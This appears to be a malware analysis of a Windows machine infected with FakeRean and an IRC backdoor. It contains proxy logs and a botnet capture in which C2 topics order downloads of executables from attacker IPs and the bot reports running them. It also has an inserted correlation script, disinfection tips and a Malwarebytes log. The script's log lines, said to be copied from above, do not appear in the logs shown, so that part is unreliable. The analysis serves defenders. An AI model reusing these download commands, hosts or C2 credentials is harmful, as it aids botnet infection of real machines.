1306233715.356  63103 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/u/ - DIRECT/70.104.104.153 text/html
1306233719.090     79 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233720.289     78 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233731.441     79 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233738.665     78 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233739.302    717 192.168.1.27 TCP_MISS/302 414 GET http://montefl.info/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/123.100.251.58 text/html
1306233740.087     77 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233749.063     86 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233770.172     83 192.168.1.27 TCP_MISS/200 345 GET http://comcmdrun.com/dw/dw.php?id=1CC19F6453407CE&ver=dm1&tp=p - DIRECT/95.211.72.209 text/html
1306233774.523   1130 192.168.1.27 TCP_MISS/200 227336 POST http://83.222.124.186/s/ - DIRECT/83.222.124.186 text/html
1306233780.011     83 192.168.1.27 TCP_MISS/302 412 GET http://prioset.org/dw/dw.php?id=1CC19F6453407CE&ver=dm1&tp=p - DIRECT/95.211.72.209 text/html
1306233780.665     80 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1CC19F6453407CE&ver=dm1&tp=p - DIRECT/95.211.72.209 text/html
1306233783.312  63101 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/u/ - DIRECT/70.104.104.153 text/html
1306233815.360  63102 192.168.1.27 TCP_MISS/504 1736 GET http://95.143.193.138/xxxx_5/bGcyMDAwfG5vbmFtZXwzMDAwMHwxfDAuMDN8MC4xNzV8NS4xIDI2MDAgU1AyLjB8b3RsODg4fF9DbWRFeGVjU2VydmVyc3xzdGFydA== - DIRECT/95.143.193.138 text/html
1306233833.280    197 192.168.1.27 TCP_MISS/504 1514 POST http://91.176.198.112/s/ - DIRECT/91.176.198.112 text/html
1306233842.093    696 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233843.032  63104 192.168.1.27 TCP_MISS/504 1800 GET http://95.143.193.138/xxxx_5/bGcyMDAwfG5vbmFtZXwzMDAwMHwxfDAuMDN8MC4xNzV8NS4xIDI2MDAgU1AyLjB8b3RsODg4fENtZEV4ZWNNYWlufGZhaWxlZHxodHRwczovL2xpdDBncmFwaHktdHlwZS5jb20v - DIRECT/95.143.193.138 text/html
1306233843.688  63103 192.168.1.27 TCP_MISS/504 1515 POST http://83.223.182.13/s/ - DIRECT/83.223.182.13 text/html
1306233845.308  63104 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/u/ - DIRECT/70.104.104.153 text/html
1306233858.684  63101 192.168.1.27 TCP_MISS/504 1515 POST http://83.223.182.13/s/ - DIRECT/83.223.182.13 text/html
1306233859.283    719 192.168.1.27 TCP_MISS/302 414 GET http://montefl.info/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/123.100.251.58 text/html
1306233859.580   1015 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
1306233860.494     82 192.168.1.27 TCP_MISS/302 462 GET http://prioset.org/dw/dw.php?id=1CC19F6453407CE&ver=dm1&tp=p - DIRECT/95.211.72.209 text/html
1306233861.705     76 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233862.988  63103 192.168.1.27 TCP_MISS/504 1515 POST http://68.60.106.144/s/ - DIRECT/68.60.106.144 text/html

The rogue belongs to a known family that has indeed been very active these last few days: Win32/FakeRean 33 in 1


The IRC backdoor is also a known one:

Some examples of the traffic generated by the IRC backdoor:

U 207.46.232.182:123 -> 192.168.1.27:123
 .........../..F@...tI......... ........V.......V                                                                                                                                         
######
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PASS hax0r..                                                                                                                                                                             
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PASS hax0r..                                                                                                                                                                             
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [A]
 ......                                                                                                                                                                                   
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 KCIK {FR|XPa}luauzzu..RSSR luauzzu 0 0 :luauzzu..                                                                                                                                        
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 KCIK {FR|XPa}luauzzu..RSSR luauzzu 0 0 :luauzzu..                                                                                                                                        
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [A]
 ......                                                                                                                                                                                   
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [AP]
 :IRC!IRC@hub.us.com PRIVMSG {FR|XPa}luauzzu :.VERSION...:hub.us.com 001 {FR|XPa}luauzzu :us, {FR|XPa}luauzzu!luauzzu@AMontsouris-152-1-44-236.w82-123.abo.wanadoo.fr..:..:hub.us.com 005 
 {FR|XPa}luauzzu ..:{FR|XPa}luauzzu!luauzzu@xxxx.wanadoo.fr JOIN :#dpi..:hub.us.com 332 {FR|XPa}luauzzu #dpi :.dl http://91.200.241.40/999.exe .dl http://
 96.44.181.226/images/3383.exe .dl http://91.200.241.40/bnet.exe..:hub.us.com 333 {FR|XPa}luauzzu #dpi ND23 1305679807..:hub.us.com 353 {FR|XPa}luauzzu @ #dpi :{FR|XPa}luauzzu ..........
 ................................................................                                                                                                                         
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 SEND #ng ng00..                                                                                                                                                                          
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 SEND #ng ng00..                                                                                                                                                                          
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [AP]
 :{FR|XPa}luauzzu!luauzzu@AMontsouris-152-1-44-236.w82-123.abo.wanadoo.fr JOIN :#ng..:hub.us.com 332 {FR|XPa}luauzzu #ng :.dl http://91.200.241.40/nw1jdcbhs.exe..:hub.us.com 333 {FR|XPa}
 luauzzu #ng ND87 1306161701..:hub.us.com 353 {FR|XPa}luauzzu @ #ng :{FR|XPa}luauzzu ..........................................................................                           
###
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://91.200.241.40/999.exe" s="33792 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\1.tmp" - Download retries: 0..                             
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://91.200.241.40/999.exe" s="33792 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\1.tmp" - Download retries: 0..                             
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [AP]
 ......                                                                                                                                                                                   
########
T 192.168.1.27:1179 -> 59.63.157.62:6939 [AP]
 PASS laorosr..                                                                                                                                                                           
#
T 192.168.1.27:1179 -> 59.63.157.62:6939 [AP]
 PASS laorosr..                                                                                                                                                                           
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://96.44.181.226/images/3383.exe" s="27648 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\2.tmp" - Download retries: 0..                     
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://96.44.181.226/images/3383.exe" s="27648 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\2.tmp" - Download retries: 0..                     
#
###
T 192.168.1.27:1179 -> 59.63.157.62:6939 [AP]
 PRRVMSG #i :HTTP SET http://31.184.237.32/b.exe..                                                                                                                                        
#
T 192.168.1.27:1179 -> 59.63.157.62:6939 [AP]
 PRRVMSG #i :HTTP SET http://31.184.237.32/b.exe.. 
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://91.200.241.40/nw1jdcbhs.exe" s="59478 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\4.tmp" - Download retries: 0..                       
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://91.200.241.40/nw1jdcbhs.exe" s="59478 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\4.tmp" - Download retries: 0..                       
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [AP]
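Added example (my code, not the author's): the IRC capture above and the proxy log before it tell the same story and can be tied together. The script reads the reassembled payloads (copied from the ngrep output), maps the mangled verbs KCIK, RSSR, SEND and PRRVMSG to the standard NICK, USER, JOIN and PRIVMSG they behave as, pulls every URL out of the `.dl` topic commands, the `HTTP SET` command and the bot's own download reports, and matches them against Squid access-log lines. The verb mapping is my inference from the exchange; the log lines are copied from above.

```python
import re
from typing import Dict, List, Set, Tuple

# Reassembled IRC payloads copied from the ngrep capture above; ngrep prints
# each CR/LF byte as a dot, so ".." marks the end of one IRC command.
IRC_CAPTURE = [
    "KCIK {FR|XPa}luauzzu..RSSR luauzzu 0 0 :luauzzu..",
    ":hub.us.com 332 {FR|XPa}luauzzu #dpi :.dl http://91.200.241.40/999.exe "
    ".dl http://96.44.181.226/images/3383.exe .dl http://91.200.241.40/bnet.exe..",
    "SEND #ng ng00..",
    ":hub.us.com 332 {FR|XPa}luauzzu #ng :.dl http://91.200.241.40/nw1jdcbhs.exe..",
    'PRIVMSG #ng :[d="http://91.200.241.40/999.exe" s="33792 bytes"] Executed file '
    '"C:\\Documents and Settings\\Mak\\Application Data\\1.tmp" - Download retries: 0..',
    "PRRVMSG #i :HTTP SET http://31.184.237.32/b.exe..",
]

# Lines copied from the Squid access log above (native format: timestamp, elapsed,
# client, code/status, bytes, method, URL, ident, hierarchy/peer, content type).
SQUID_LOG = """\
1306231714.090   1023 192.168.1.27 TCP_MISS/200 97594 GET http://co102w.col102.mail.live.com/mail/InboxLight.aspx?n=1181253781 - DIRECT/65.55.33.119 text/html
1306233437.604    328 192.168.1.27 TCP_MISS/200 34190 GET http://91.200.241.40/999.exe - DIRECT/91.200.241.40 application/octet-stream
1306233439.388    725 192.168.1.27 TCP_MISS/200 28050 GET http://96.44.181.226/images/3383.exe - DIRECT/96.44.181.226 application/x-msdos-program
1306233440.778    326 192.168.1.27 TCP_MISS/200 47907 GET http://91.200.241.40/bnet.exe - DIRECT/91.200.241.40 application/octet-stream
1306233442.186    346 192.168.1.27 TCP_MISS/200 59876 GET http://91.200.241.40/nw1jdcbhs.exe - DIRECT/91.200.241.40 application/octet-stream
1306233504.756  63118 192.168.1.27 TCP_MISS/504 1541 GET http://ppppnipponp.r7m.us/cgi-bin/p.cgi - DIRECT/1.1.1.1 text/html
1306233532.177    836 192.168.1.27 TCP_MISS/200 36049 GET http://31.184.237.32/b.exe - DIRECT/31.184.237.32 application/x-msdownload
"""

# Verb substitutions inferred from the exchange: the server answers "SEND #ng ng00"
# with a JOIN, "KCIK x..RSSR x 0 0 :x" is NICK/USER registration, and PRRVMSG
# carries channel text like PRIVMSG. An IDS keyed on the standard verbs sees none.
MANGLED_VERBS = {"KCIK": "NICK", "RSSR": "USER", "SEND": "JOIN", "PRRVMSG": "PRIVMSG"}
URL_RE = re.compile(r'https?://[^\s"]+')
BARE_IP_URL_RE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}/")
EXE_MIME = {"application/octet-stream", "application/x-msdos-program", "application/x-msdownload"}


def decode_commands(payload: str) -> List[Tuple[str, str]]:
    """Split a payload at the CR/LF dots and map each verb to its standard IRC verb."""
    out = []
    for segment in re.split(r"\.\.+", payload):
        tokens = segment.split()
        if not tokens:
            continue
        # Server lines carry a ":prefix" token before the verb or numeric reply.
        verb = tokens[1] if tokens[0].startswith(":") and len(tokens) > 1 else tokens[0]
        out.append((verb, MANGLED_VERBS.get(verb, verb)))
    return out


def extract_download_urls(payloads: List[str]) -> Dict[str, Set[str]]:
    """Every URL the bot was told to fetch, or reported fetching, with its context."""
    urls: Dict[str, Set[str]] = {}
    for payload in payloads:
        for m in URL_RE.finditer(payload):
            url = m.group(0).rstrip(".")            # drop the CR/LF dots glued to it
            before = payload[:m.start()].rstrip()
            if before.endswith(".dl"):
                ctx = "topic .dl command"
            elif before.endswith("HTTP SET"):
                ctx = "HTTP SET command"
            elif before.endswith('[d="'):
                ctx = "bot download report"
            else:
                ctx = "other"
            urls.setdefault(url, set()).add(ctx)
    return urls


def parse_squid(text: str) -> List[Dict[str, object]]:
    """Parse Squid native access-log lines into dicts."""
    entries = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 10:
            continue
        entries.append({"ts": float(f[0]), "client": f[2], "status": int(f[3].split("/")[1]),
                        "bytes": int(f[4]), "method": f[5], "url": f[6],
                        "peer": f[8].split("/", 1)[-1], "mime": f[9]})
    return entries


def executable_fetches(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Successful GETs of executable content from bare-IP hosts, the pattern seen above."""
    return [e for e in entries
            if e["method"] == "GET" and e["status"] == 200
            and BARE_IP_URL_RE.match(str(e["url"]))
            and (e["mime"] in EXE_MIME or str(e["url"]).lower().endswith(".exe"))]


def correlate(urls: Dict[str, Set[str]], entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Proxy-log entries whose URL was ordered or reported over the IRC channel."""
    return [{**e, "irc_context": sorted(urls[str(e["url"])])}
            for e in entries if str(e["url"]) in urls]


if __name__ == "__main__":
    for hit in correlate(extract_download_urls(IRC_CAPTURE), parse_squid(SQUID_LOG)):
        print(f"{hit['url']:45} {hit['bytes']:>6} B {hit['mime']:28} {hit['irc_context']}")
```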

Note also that the machine sends spam; however, since the backdoor runs fairly aggressive scans looking for machines with remotely exploitable vulnerabilities, the internet connection can become very slow or stop working altogether.
The volume of spam sent is therefore fairly low, the backdoor's scanning slowing everything down.

Some disinfection tips for this pack

The internet connection may not work, so it is advisable to run Malwarebytes in Safe Mode with Networking, where a good part of the malicious pack will not be active.
To do this, restart the computer and, before the Windows logo appears, tap the F8 key; a menu will appear. Choose Safe Mode with Networking and press Enter.

Use RogueKiller to remove the rogue, which can prevent Malwarebytes from running.

At the end of the Malwarebytes scan, you should get something like this:

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Version de la base de données: 6661

Windows 5.1.2600 Service Pack 2
Internet Explorer 6.0.2900.2180

24/05/2011 13:46:18
mbam-log-2011-05-24 (13-46-14).txt

Type d'examen: Examen rapide
Elément(s) analysé(s): 131616
Temps écoulé: 3 minute(s), 31 seconde(s)

Processus mémoire infecté(s): 2
Module(s) mémoire infecté(s): 2
Clé(s) du Registre infectée(s): 8
Valeur(s) du Registre infectée(s): 51
Elément(s) de données du Registre infecté(s): 9
Dossier(s) infecté(s): 3
Fichier(s) infecté(s): 55

Processus mémoire infecté(s):
c:\documents and settings\Mak\application data\F.tmp (Trojan.Proxy) -> 3880 -> No action taken.
c:\documents and settings\Mak\local settings\application data\vrw.exe (Trojan.FakeAlert) -> 3256 -> No action taken.

Module(s) mémoire infecté(s):
c:\WINDOWS\system32\jb6xrjo.dll (Trojan.Ertfor) -> No action taken.
c:\WINDOWS\system32\uqmcbwbu.dll (IPH.GenericBHO) -> No action taken.

Clé(s) du Registre infectée(s):
HKEY_CLASSES_ROOT\CLSID\{24A123C3-A500-99BD-A120-04B53A2C8952} (Trojan.Ertfor) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{24A123C3-A500-99BD-A120-04B53A2C8952} (Trojan.Ertfor) -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{24A123C3-A500-99BD-A120-04B53A2C8952} (Trojan.Ertfor) -> No action taken.
HKEY_CLASSES_ROOT\CLSID\{F569D725-C1CC-4A9F-4B6E-9923A41BB8F9} (IPH.GenericBHO) -> No action taken.
HKEY_CLASSES_ROOT\Tvsoabov (IPH.GenericBHO) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F569D725-C1CC-4A9F-4B6E-9923A41BB8F9} (IPH.GenericBHO) -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{F569D725-C1CC-4A9F-4B6E-9923A41BB8F9} (IPH.GenericBHO) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SETUP.EXE (Malware.Packer.Gen) -> No action taken.

Valeur(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{24A123C3-A500-99BD-A120-04B53A2C8952} (Trojan.Ertfor) -> Value: {24A123C3-A500-99BD-A120-04B53A2C8952} -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgqO (Malware.Packer.Gen) -> Value: HNUdHTgqO -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgqO (Malware.Packer.Gen) -> Value: HNUdHTgqO -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Setup (Malware.Gen) -> Value: Microsoft Driver Setup -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Driver Setup (Malware.Gen) -> Value: Microsoft Driver Setup -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKfre (Malware.Packer.Gen) -> Value: MKfre -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKfre (Malware.Packer.Gen) -> Value: MKfre -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgoA (Malware.Packer.Gen) -> Value: HNUdHTgoA -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgoA (Malware.Packer.Gen) -> Value: HNUdHTgoA -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKfsc (Malware.Packer.Gen) -> Value: MKfsc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKfsc (Malware.Packer.Gen) -> Value: MKfsc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKZe (Malware.Packer.Gen) -> Value: MKZe -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKZe (Malware.Packer.Gen) -> Value: MKZe -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKeg (Malware.Packer.Gen) -> Value: MKeg -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKeg (Malware.Packer.Gen) -> Value: MKeg -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgrA (Malware.Packer.Gen) -> Value: HNUdHTgrA -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgrA (Malware.Packer.Gen) -> Value: HNUdHTgrA -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKctc (Malware.Packer.Gen) -> Value: MKctc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKctc (Malware.Packer.Gen) -> Value: MKctc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKZSc (Malware.Packer.Gen) -> Value: MKZSc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKZSc (Malware.Packer.Gen) -> Value: MKZSc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKeuf (Malware.Packer.Gen) -> Value: MKeuf -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKeuf (Malware.Packer.Gen) -> Value: MKeuf -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKee (Malware.Packer.Gen) -> Value: MKee -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKee (Malware.Packer.Gen) -> Value: MKee -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgre (Malware.Packer.Gen) -> Value: HNUdHTgre -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgre (Malware.Packer.Gen) -> Value: HNUdHTgre -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgpta (Malware.Packer.Gen) -> Value: HNUdHTgpta -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgpta (Malware.Packer.Gen) -> Value: HNUdHTgpta -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgrsc (Malware.Packer.Gen) -> Value: HNUdHTgrsc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgrsc (Malware.Packer.Gen) -> Value: HNUdHTgrsc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcrc (Malware.Packer.Gen) -> Value: MKcrc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcrc (Malware.Packer.Gen) -> Value: MKcrc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcZ (Malware.Packer.Gen) -> Value: MKcZ -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcZ (Malware.Packer.Gen) -> Value: MKcZ -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgph (Malware.Packer.Gen) -> Value: HNUdHTgph -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgph (Malware.Packer.Gen) -> Value: HNUdHTgph -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgoe (Malware.Packer.Gen) -> Value: HNUdHTgoe -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgoe (Malware.Packer.Gen) -> Value: HNUdHTgoe -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgl/ (Malware.Packer.Gen) -> Value: HNUdHTgl/ -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgl/ (Malware.Packer.Gen) -> Value: HNUdHTgl/ -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcuc (Malware.Packer.Gen) -> Value: MKcuc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcuc (Malware.Packer.Gen) -> Value: MKcuc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12CFG214-K641-12SF-N85P (Trojan.Downloader) -> Value: 12CFG214-K641-12SF-N85P -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tuozeu (Heuristics.Shuriken) -> Value: tuozeu -> No action taken.
HKEY_CLASSES_ROOT\.exe\shell\open\command\(default) (Hijack.ExeFile) -> Value: (default) -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WINID (Malware.Trace) -> Value: WINID -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\idstrf (Malware.Trace) -> Value: idstrf -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions (Hijack.FolderOptions) -> Value: NoFolderOptions -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\engel (Backdoor.Agent) -> Value: engel -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman (Trojan.Agent) -> Value: Taskman -> No action taken.

Elément(s) de données du Registre infecté(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman (Malware.Gen) -> Bad: (c:\RECYCLER\R-1-5-21-1482476501-1644491937-682003330-1013\acleaner.exe) Good: () -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools (PUM.Hijack.Regedit) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command\(default) (Hijack.StartMenuInternet) -> Bad: ("C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe" -a "C:\Program Files\Mozilla Firefox\firefox.exe") Good: (firefox.exe) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command\(default) (Hijack.StartMenuInternet) -> Bad: ("C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe" -a "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode) Good: (firefox.exe -safe-mode) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\(default) (Hijack.StartMenuInternet) -> Bad: ("C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe" -a "C:\Program Files\Intern) Good: (iexplore.exe) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_CLASSES_ROOT\exefile\shell\open\command\(default) (Broken.OpenCommand) -> Bad: ("C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe" -a "%1" %*) Good: ("%1" %*) -> No action taken.

Dossier(s) infecté(s):
c:\RECYCLER\s-1-5-21-0243936033-3052116371-381863308-1811 (Trojan.Agent) -> No action taken.
c:\WINDOWS\system32\lowsec (Stolen.data) -> No action taken.
c:\RECYCLER\r-1-5-21-1482476501-1644491937-682003330-1013 (Worm.AutoRun.Gen) -> No action taken.

Fichier(s) infecté(s):
c:\WINDOWS\system32\jb6xrjo.dll (Trojan.Ertfor) -> No action taken.
c:\documents and settings\Mak\application data\F.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\local settings\application data\vrw.exe (Trojan.FakeAlert) -> No action taken.
c:\WINDOWS\system32\uqmcbwbu.dll (IPH.GenericBHO) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\tje8p.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\aadrive32.exe (Malware.Gen) -> No action taken.
c:\WINDOWS\wininst.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\avp32.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\winlogon.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\avp.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\smss.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\win32.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\msmgm.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\avp32.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\spoolsv.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\user.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\smss.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\services.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\winlogon.exe (Malware.Packer.Gen) -> No action taken.
